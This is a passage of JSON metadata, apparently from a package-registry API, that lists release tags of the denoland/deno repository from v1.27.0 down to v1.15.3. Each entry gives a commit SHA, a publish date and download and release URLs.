yste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d